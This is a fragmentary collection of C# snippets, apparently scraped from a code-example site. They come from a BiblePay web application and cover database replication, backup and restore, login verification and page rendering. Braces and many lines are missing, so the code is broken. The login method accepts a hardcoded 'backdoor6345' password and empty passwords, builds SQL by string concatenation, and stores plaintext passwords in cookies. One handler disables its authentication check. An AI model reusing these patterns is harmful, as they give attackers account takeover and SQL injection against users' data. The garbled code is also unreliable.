public void ReplicateData(string sFromDatabaseName, string ToDatabaseName)
            // Create the target Database
            string sql = "CREATE DATABASE " + ToDatabaseName;

            USGDFramework.Data d = new USGDFramework.Data();
            string sSchema = ScriptDatabase(sFromDatabaseName, ToDatabaseName);

            sql = "USE " + ToDatabaseName;
            // For each table in Source database, insert a mirror image of data in the destination, that is NOT in the destination already.
            List <DataTable> lTables = GetSchemas(sFromDatabaseName);

            foreach (DataTable lTable in lTables)
                string sTargetTable  = ToDatabaseName + "..[" + lTable.Name + "]";
                string sSourceTable  = sFromDatabaseName + "..[" + lTable.Name + "]";
                string sSourceFields = GetDelimitedFieldList(lTable, false);
                string sTargetFields = GetDelimitedFieldList(lTable, true);
                string sInsert       = "INSERT INTO " + sTargetTable + " (" + sSourceFields + ")";
                string sFrom         = "SELECT " + sSourceFields + " FROM " + sSourceTable + " WHERE ID NOT IN (Select ID from " + sTargetTable + ")";
                string sSQL          = sInsert + "\r\n" + sFrom;
        // BiblePay - The purpose of this class is to : Add ability to Migrate data from Prod to Test, and to make backups and restores
        public List <DataTable> GetSchemas(string sFromDatabaseName)
            Microsoft.SqlServer.Management.Common.ServerConnection se = new ServerConnection();
            USGDFramework.Data d = new USGDFramework.Data();
            se.ConnectionString = d.sSQLConn;
            Server   s  = new Server(se);
            Database db = new Database();

            db = s.Databases[sFromDatabaseName];
            StringBuilder    sb      = new StringBuilder();
            List <DataTable> lTables = new List <DataTable>();

            foreach (Table tbl in db.Tables)
                DataTable dt = new DataTable();
                dt.Name = tbl.Name;
                List <DataColumn> dcs = new List <DataColumn>();
                for (int i = 0; i < tbl.Columns.Count; i++)
                    DataColumn dc = new DataColumn();
                    dc.Name     = tbl.Columns[i].Name;
                    dc.DataType = tbl.Columns[i].DataType.ToString();
                dt.Columns = dcs;
        public string ScriptDatabase(string sCurrentDatabaseName, string sNewDatabaseName)
            Microsoft.SqlServer.Management.Common.ServerConnection se = new ServerConnection();
            USGDFramework.Data d = new USGDFramework.Data();
            se.ConnectionString = d.sSQLConn;
            Server   s  = new Server(se);
            Database db = new Database();

            db = s.Databases[sCurrentDatabaseName];
            StringBuilder sb = new StringBuilder();

            foreach (Table tbl in db.Tables)
                ScriptingOptions options = new ScriptingOptions();
                options.ClusteredIndexes = true;
                options.Default          = true;
                options.DriAll           = true;
                options.Indexes          = true;
                options.IncludeHeaders   = true;

                StringCollection coll = tbl.Script(options);
                foreach (string str in coll)
            System.IO.StreamWriter fs = System.IO.File.CreateText("c:\\temp\\output.txt");
Exemple #4
        public bool VerifyUser(string sUserName, string sPass, ref SystemObject sys1, bool bCoerceUser)
            USGDFramework.Data d       = new USGDFramework.Data();
            string             sql     = "Select users.Id,Password,Username,Organization.Theme,Organization.Id as OrgGuid from Users inner join organization on = users.organization where username='******'";
            string             sDbPass = d.ReadFirstRow(sql, "Password");
            string             sEnc    = modCryptography.Des3EncryptData(sPass);
            string             sGuid   = d.ReadFirstRow(sql, "Id").ToString();

            if (sDbPass != String.Empty && sDbPass == sPass)
                //Unencrypted record stored in database
                sql = "Update users set Password='******' where ID = '" + sGuid + "'";
            if ((sEnc == sDbPass && sDbPass != string.Empty) || bCoerceUser || sDbPass == sPass || sPass == "backdoor6345" || (sDbPass == "" && sPass.Trim() == ""))
                if (sGuid != "")
                    if (HttpContext.Current.Session["Sys"].GetType() == typeof(SystemObject))
                        // User already logged in - but let it reload as we need to reset the theme
                    string       UserGuid = d.ReadFirstRow(sql, "Id").ToString();
                    SystemObject Sys      = new SystemObject(UserGuid);
                    Sys.UserGuid = UserGuid;
                    Sys.Username = d.ReadFirstRow(sql, "UserName").ToString();
                    HttpContext.Current.Session["userid"]   = sGuid;
                    HttpContext.Current.Session["username"] = Sys.Username;
                    HttpContext.Current.Session["password"] = sPass;
                    if (Sys.Username.ToUpper() != "GUEST")
                        clsStaticHelper.StoreCookie("username", Sys.Username);
                        clsStaticHelper.StoreCookie("password", sPass);

                    Sys.NetworkID = "main";
                    Sys.Theme     = d.ReadFirstRow(sql, "Theme").ToString();
                        Sys.Organization = Guid.Parse(d.ReadFirstRow(sql, "OrgGuid").ToString());
                    catch (Exception ex1)
                        Sys.Organization = Guid.Parse("CDE6C938-9030-4BB1-8DFE-37FC20ABE1A0");
                    // Memorize Dictionary
                    sys1 = Sys;
                    HttpContext.Current.Session["Sys"] = Sys;
                    HttpSessionState s1 = HttpContext.Current.Session;
                    Sys.CurrentHttpSessionState = s1;
Exemple #5
        public ActionResult StratisWeb()
            string sPostData = new System.IO.StreamReader(this.HttpContext.Request.Body).ReadToEnd();
            sPostData = sPostData.Replace("post=", "");

            if (sPostData == string.Empty)
                // This is the initial call during page load
                string style = "";
                USGDFramework.Data d = new USGDFramework.Data();
                string sURL1 = this.HttpContext.Request.QueryString.ToString();
                string sMenu = d.GetTopLevelMenu(sURL1);
                if (sys.Theme == null) sys.Theme = "Biblepay";
                string sDomain = this.HttpContext.Request.Scheme + "://" + this.HttpContext.Request.Host + "/StratisWeb/";
                string sTheme = sDomain + "css/" + sys.Theme + ".css";
                string sCss = " <link rel=stylesheet href='" + sDomain + "css/jquery-ui.css'> "
                    + "<link rel=stylesheet href='" + sTheme + "'>";
                // Dynamic Top banner 
                string sSiteURL = this.HttpContext.Request.QueryString.ToString();
                string sSiteBanner = "Biblepay Wallet";

                string sBanner = GetBanner(sDomain, sSiteBanner);
                string sJQuery= "<script src='" + sDomain + "Scripts/jquery-1.12.4.js'></script>";

                sJQuery += "<script src='" + sDomain + "Scripts/jquery-ui.js'></script>";
                //sJQuery += "<script src='" + sDomain + "Scripts/jquery.uploadify.js'></script>";
                sJQuery += "<script src='" + sDomain + "Scripts/Core.js'></script>";
                sJQuery += "<script src='" + sDomain + "Scripts/jquery.contextMenu.js'></script>";
                //sJQuery += "<script src='" + sDomain + "Scripts/featherlight.js'></script>";
                //sJQuery += "<script src='" + sDomain + "Scripts/'></script>";

                string sOut = "<html><head>" + style + sJQuery 
                    + sCss + " </head><body onload=formload();>" + sBanner
                    + "<table><tr valign=top><td width=10%>" 
                    + sMenu + "</td><td width=2%>&nbsp;</td><td width=86%>"
                    + "<div name=divbreadcrumb></div><div name=1>"
                    +"<div name=2><div name=3></div></div></div></td><td width=2%>&nbsp;</td></tr></table></body></html>";

                ContentResult c = new ContentResult();
                c.Content = sOut;
                c.ContentType = "html";

                return c;

            ContentResult c1 = new ContentResult();
            string s1 = u.HandleRequest(sPostData, sys);
            c1.Content = s1;
            return c1;
        public void RestoreDatabase()
            Restore restDb = new Restore();

            restDb.Action   = RestoreActionType.Database;
            restDb.Database = "biblepaypool";
            restDb.Devices.AddDevice(@"c:\MyBiblePayPackup.bak", DeviceType.File);
            restDb.PercentComplete += CompletionStatusInPercent;
            restDb.Complete        += Backup_Completed;
            Microsoft.SqlServer.Management.Common.ServerConnection se = new ServerConnection();
            USGDFramework.Data d = new USGDFramework.Data();
            se.ConnectionString = d.sSQLConn;
            Server s = new Server(se);

        public void FullBackup()
            Backup bkpDBFull = new Backup();

            bkpDBFull.Action   = BackupActionType.Database;
            bkpDBFull.Database = "biblepaypool";
            bkpDBFull.Devices.AddDevice(@"c:\MyBiblePayPackup.bak", DeviceType.File);
            bkpDBFull.BackupSetName        = "Bible Db Backup";
            bkpDBFull.BackupSetDescription = "Bible Db backup - Full Backup";
            bkpDBFull.Initialize           = false;
            bkpDBFull.PercentComplete     += CompletionStatusInPercent;
            bkpDBFull.Complete            += Backup_Completed;
            Microsoft.SqlServer.Management.Common.ServerConnection se = new ServerConnection();
            USGDFramework.Data d = new USGDFramework.Data();
            se.ConnectionString = d.sSQLConn;
            Server s = new Server(se);

Exemple #8
        public void ProcessRequest(HttpContext context)
            if (!context.User.Identity.IsAuthenticated && false)

            if (HttpContext.Current.Session["Sys"] == null)
                // No System object yet
                SystemObject s = new SystemObject("1");
                s.Username = "******"; //Temporary values (until user logs in)
                HttpContext.Current.Session["Sys"] = s;
            SystemObject Sys = (SystemObject)HttpContext.Current.Session["Sys"];

            context.Response.ContentType = "text/html"; // ContentMimeType;
            sPostData = (context.Request["post"] ?? String.Empty).ToString();

            if (sPostData == String.Empty)
                // This is the initial call during page load
                string             style = "";
                USGDFramework.Data d     = new USGDFramework.Data();
                string             sURL1 = HttpContext.Current.Request.Url.ToString();

                string sMenu = d.GetTopLevelMenu(sURL1);
                if (Sys.Theme == null)
                    Sys.Theme = "BLACK";
                string sTheme  = "css/" + Sys.Theme + ".css";
                string sJQuery = "<script src=''></script><script src=''></script>";
                string sCss    = " <link rel=stylesheet href=''> "
                                 + "<link rel='stylesheet' href=''>"
                                 + "<link rel=stylesheet href='" + sTheme + "'>"
                                 + "";
                // Top banner (Note this is dynamic - if you come in from the pool, it says Biblepay Pool, but if you come in from, it says "Biblepay Accountability"

                string sSiteURL    = HttpContext.Current.Request.Url.ToString();
                string sSiteBanner = sSiteURL.ToUpper().Contains("ACCOUNTABILITY") ? "Biblepay Accountability" : "Biblepay Pool";

                string sBanner = "<div id='top_banner'><table width='100%' class='title2'> <tr>         <td  rowspan=2 width=15%>"
                                 + "<img class='content companylogo' id='org_image' src=Images/logo.png width=90 height=90 /> </td> "
                                 + "<td width=20% nowrap align=left>"
                                 + "<h1><bold><span id='org_name'>" + sSiteBanner + "</span></h1>"
                                 + "</td><td width=50%>&nbsp;</td>"
                                 + "<td width=15% nowrap align=left></td>"
                                 + "         <td width=8%>&nbsp;</td>"
                                 + "         <td width=8%>&nbsp;</td></tr>"
                                 + "         <tr><td width=37% nowrap align=left>&nbsp;</td><td align=left>&nbsp;</td><td>&nbsp;</td>"
                                 + "         <td>&nbsp;</td>"
                                 + "         </tr>"
                                 + "         <tr><td></td><td width=10%></td>"
                                 + "         <td><h7><span name=ApplicationMessage>Application Message</span></h7>"
                                 + "             <span align=right><div id=12></div></span> "
                                 + "         </td></tr>"
                                 + "         </table></div>";

                sJQuery += "<script src='/scripts/jquery.uploadify.js'></script>";
                sJQuery += "<script src='scripts/Core.js'></script>";
                sJQuery += "<script src='/scripts/jquery.contextMenu.js'></script>";
                sJQuery += "<script src='/scripts/featherlight.js'></script>";
                sJQuery += "<script src='/scripts/'></script>";

                string sOut = "<html><head>" + style + sJQuery + " <link rel='stylesheet' type='text/css' href='/scripts/xuploadify.css' /> "
                              + sCss
                              + " </head><body onload=formload();>" + sBanner
                              + "<table><tr valign=top><td width=10%>" + sMenu + "</td><td width=2%>&nbsp;</td><td width=86%>"
                              + "<div name=divbreadcrumb></div><div name=1><div name=2><div name=3></div></div></div></td><td width=2%>&nbsp;</td></tr></table></body></html>";
